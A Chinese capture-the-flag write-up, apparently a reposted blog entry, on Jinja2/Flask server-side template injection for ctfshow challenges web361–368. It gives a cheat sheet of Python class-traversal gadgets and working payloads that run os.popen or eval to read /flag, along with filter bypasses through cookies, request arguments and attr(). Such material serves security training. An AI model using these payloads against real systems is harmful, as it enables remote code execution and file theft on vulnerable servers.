ctfshow-SSTI(未更完)
作者:互联网
SSTI 面板注入!
先补充一波基本知识!
//获取基本类
''.__class__.__mro__[1]
{}.__class__.__bases__[0]
().__class__.__bases__[0]
[].__class__.__bases__[0]
object
//读文件
().__class__.__bases__[0].__subclasses__()[40](r'C:\1.php').read()
object.__subclasses__()[40](r'C:\1.php').read()
//写文件
().__class__.__bases__[0].__subclasses__()[40]('/var/www/html/input', 'w').write('123')
object.__subclasses__()[40]('/var/www/html/input', 'w').write('123')
//执行任意命令
().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.values()[13]['eval']('__import__("os").popen("ls /var/www/html").read()' )
object.__subclasses__()[59].__init__.func_globals.values()[13]['eval']('__import__("os").popen("ls /var/www/html").read()' )
SSTI神器–Tplmap!
基础!
__base__ //对象的一个基类,一般情况下是object,有时不是,这时需要使用下一个方法
__mro__ //同样可以获取对象的基类,只是这时会显示出整个继承链的关系,是一个列表,object在最底层故在列表中的最后,通过__mro__[-1]可以获取到
__base__ //类型对象的直接基类
__bases__ //类型对象的全部基类,以元组形式,类型的实例通常没有属__bases__
__subclasses__() //继承此对象的子类,返回一个列表
__globals__ //返回一个由当前函数可以访问到的变量,方法,模块组成的字典,不包含该函数内声明的局部变量。
__getattribute__()实例、类、函数都具有的__getattribute__魔术方法。事实上,在实例化的对象进行.操作的时候(形如:a.xxx/a.xxx()),都会自动去调用__getattribute__方法。因此我们同样可以直接通过这个方法来获取到实例、类、函数的属性。
__builtins__ //返回一个由内建函数函数名组成的列表。
__getitem__(index) //返回索引为index的值。
url_for //可以直接和__globals__配合,如:url_for.__globals__['__builtins__'],或者和string等配合,详情看迭代器部分
lipsum //flask的一个方法,可以直接和__globals__配合,如:lipsum.__globals__['__builtins__'],或者和string等配合,详情看迭代器部分
__init__ //该方法用于将对象实例化,如x.__init__.__globals__['__builtins__']
//{{''.__class__.__mro__[-1].__subclasses__()["type"].__init__.__globals__}}像这种找到了类要查看该类的方法要先__init__再用__globals__,直接用__globals__会报错
config //查看配置文件
app
__doc__
get_flashed_messages // flask的一个方法,可以用于得到__builtins__,而且url_for.__globals__['__builtins__']含有current_app。
__dic__ // 类的静态函数、类函数、普通函数、全局变量以及一些内置的属性都是放在类的__dict__里
current_app 应用上下文,一个全局变量。
__import__ //动态加载类和函数,也就是导入模块,经常用于导入os模块,__import__('os').popen('ls').read()]
SSTI常用的一些语句
{{5*5}} 直接执行
{% set a="test" %}{{a}} //设置变量
{% for i in ['t ','e ','s ','t '] %}{{i}}{%endfor%} //执行循环
{% if 25==5*5 %}{{"success"}}{% endif %} //条件执行
再来摘抄一些!
__class__ 类的一个内置属性,表示实例对象的类。
__base__ 类型对象的直接基类
__bases__ 类型对象的全部基类,以元组形式,类型的实例通常没有属性 __bases__
__mro__ 此属性是由类组成的元组,在方法解析期间会基于它来查找基类。
__subclasses__() 返回这个类的子类集合,Each class keeps a list of weak references to its immediate subclasses. This method returns a list of all those references still alive. The list is in definition order.
__init__ 初始化类,返回的类型是function
__globals__ 使用方式是 函数名.__globals__获取function所处空间下可使用的module、方法以及所有变量。
__dic__ 类的静态函数、类函数、普通函数、全局变量以及一些内置的属性都是放在类的__dict__里
__getattribute__() 实例、类、函数都具有的__getattribute__魔术方法。事实上,在实例化的对象进行.操作的时候(形如:a.xxx/a.xxx()),都会自动去调用__getattribute__方法。因此我们同样可以直接通过这个方法来获取到实例、类、函数的属性。
__getitem__() 调用字典中的键值,其实就是调用这个魔术方法,比如a['b'],就是a.__getitem__('b')
__builtins__ 内建名称空间,内建名称空间有许多名字到对象之间映射,而这些名字其实就是内建函数的名称,对象就是这些内建函数本身。即里面有很多常用的函数。__builtins__与__builtin__的区别就不放了,百度都有。
__import__ 动态加载类和函数,也就是导入模块,经常用于导入os模块,__import__('os').popen('ls').read()]
__str__() 返回描写这个对象的字符串,可以理解成就是打印出来。
url_for flask的一个方法,可以用于得到__builtins__,而且url_for.__globals__['__builtins__']含有current_app。
get_flashed_messages flask的一个方法,可以用于得到__builtins__,而且url_for.__globals__['__builtins__']含有current_app。
lipsum flask的一个方法,可以用于得到__builtins__,而且lipsum.__globals__含有os模块:{{lipsum.__globals__['os'].popen('ls').read()}}
current_app 应用上下文,一个全局变量。
request 可以用于获取字符串来绕过,包括下面这些,引用一下羽师傅的。此外,同样可以获取open函数:request.__init__.__globals__['__builtins__'].open('/proc\self\fd/3').read()
request.args.x1 get传参
request.values.x1 所有参数
request.cookies cookies参数
request.headers 请求头参数
request.form.x1 post传参 (Content-Type:applicaation/x-www-form-urlencoded或multipart/form-data)
request.data post传参 (Content-Type:a/b)
request.json post传json (Content-Type: application/json)
config 当前application的所有配置。此外,也可以这样{{ config.__class__.__init__.__globals__['os'].popen('ls').read() }}
g {{g}}得到<flask.g of 'flask_ssti'>
web361
然后我们就可以利用这个了!
?name={{().__class__.__mro__[-1].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}}
web362
从这道题就开始了过滤了!
所有我们用这个来进行构造!
?name={{().__class__.__mro__.__subclasses__.__init__.__globals__['__builtins__'].eval('__import__("os").popen("cat /flag").read()')}}
或者
?name={{x.__init__.__globals__['__builtins__'].eval('__import__("os").popen("cat /flag").read()')}}
又去其它大佬博客里吸取了一波天地灵气
{% for i in ''.__class__.__mro__[1].__subclasses__() %}{% if i.__name__=='_wrap_close' %}{% print i.__init__.__globals__['popen']('ls').read() %}{% endif %}{% endfor %}
这个是没有办法弄到flag的(我认为的,本人小菜!)
web363
这里的思路和上一题差不多!但是我们需要进行一定的构造!
经过一番尝试后发现过滤了单双引号!所以这里就要用到了request.args.x1 get传参这个来进行绕过了!
http://28136609-4732-4c23-8315-73ce3ee36ea9.challenge.ctf.show:8080/?name={{().x.__init__.__globals__[request.args.x1].eval(request.args.x2)}}&x1=__builtins__&x2=__import__('os').popen('cat /flag').read()
web364
这里不能使用了get和post进行绕过,所以我们采用了cookie来进行绕过!
http://19bf20fd-fb45-4d05-8d00-612ebf6e92c9.challenge.ctf.show:8080/?name={{().x.__init__.__globals__[request.cookies.x1].eval(request.cookies.x2)}}
Cookie: x1=__builtins__;x2=__import__('os').popen('cat /flag').read()
web365
这里中括号是不能使用了,采用的是 __ getitem __ 这种方式进行绕过!
http://c10f9098-9892-4da6-923d-7289bf23b70f.challenge.ctf.show:8080/?name={{().x.__init__.__globals__.__getitem__(request.cookies.x1).eval(request.cookies.x2)}}
Cookie: x1=__builtins__;x2=__import__('ox').popen('cat /flag').read()
还有一种方法,这是看师傅来的一个比较简单的构造!
?name={{url_for.__globals__.os.popen(request.cookies.c).read()}}
Cookie:c=cat /flag
web366
这里直接ban了下划线!有电难了,看师傅!
lipsum flask的一个方法,可以用于得到__builtins__,而且lipsum.__globals__含有os模块:{{lipsum.globals[‘os’].popen(‘ls’).read()}}
http://0d80ec51-c99e-48bf-9c2a-95183a6b0fab.challenge.ctf.show:8080/?name={{(lipsum|attr(request.cookies.x1)).os.popen(request.cookies.x2).read()}}
Cookie: x1=__globals__;x2=cat /flag
接下来的这个是看大师傅的sao操作的!
?name={{(x|attr(request.cookies.x1)|attr(request.cookies.x2)|attr(request.cookies.x3))(request.cookies.x4).eval(request.cookies.x5)}}
Cookie:x1=__init__;x2=__globals__;x3=__getitem__;x4=__builtins__;x5=__import__('os').popen('cat /flag').read()
这个比较好理解!比第一个要好理解点!
web367
这里是可以使用上面的第二个骚操作的!
?name={{(x|attr(request.cookies.x1)|attr(request.cookies.x2)|attr(request.cookies.x3))(request.cookies.x4).eval(request.cookies.x5)}}
Cookie:x1=__init__;x2=__globals__;x3=__getitem__;x4=__builtins__;x5=__import__('os').popen('cat /flag').read()
这里是ban了os的,我们可以把os进行传参绕过!
http://891667b0-1429-458a-a356-be9f56ff2fc5.challenge.ctf.show:8080/?a=__globals__&b=os&c=cat /flag&name={{(lipsum|attr(request.values.a)).get(request.values.b).popen(request.values.c).read()}}
web368
从这里就比较难了!
import requests
import string
url ='http://826c9e0c-29d3-44de-9689-9f94eec68f1b.chall.ctf.show/?name={%set aaa=(x|attr(request.cookies.x1)|attr(request.cookies.x2)|attr(request.cookies.x3))(request.cookies.x4)%}{%print(aaa.open(request.cookies.x5).read())%}'
headers={'Cookie':'''x1=__init__;x2=__globals__;x3=__getitem__;x4=__builtins__;x5=/flag'''}
r=requests.get(url,headers=headers)
print(r.text)
这里来详细的介绍一下构造的url
首先是个url,这里不用多说
http://826c9e0c-29d3-44de-9689-9f94eec68f1b.chall.ctf.show/
从这开始先set设置一个变量
?name={%set aaa=(x|attr(request.cookies.x1)|attr(request.cookies.x2)|attr(request.cookies.x3))(request.cookies.x4)%}
这里在使用我们设置的aaa进行打印
{%print(aaa.open(request.cookies.x5).read())%}
而此时我们需要利用cookie进行传参!
{'Cookie':'''x1=__init__;x2=__globals__;x3=__getitem__;x4=__builtins__;x5=/flag'''}
url这里需要注意一下小括号,根据括号来进行理解!
不过这里一直500,不知道怎么回事!
接下来的难度较大,所以先不再做下去了!
标签:__,cookies,.__,globals,request,__.__,SSTI,ctfshow 来源: https://blog.csdn.net/njh18790816639/article/details/116887942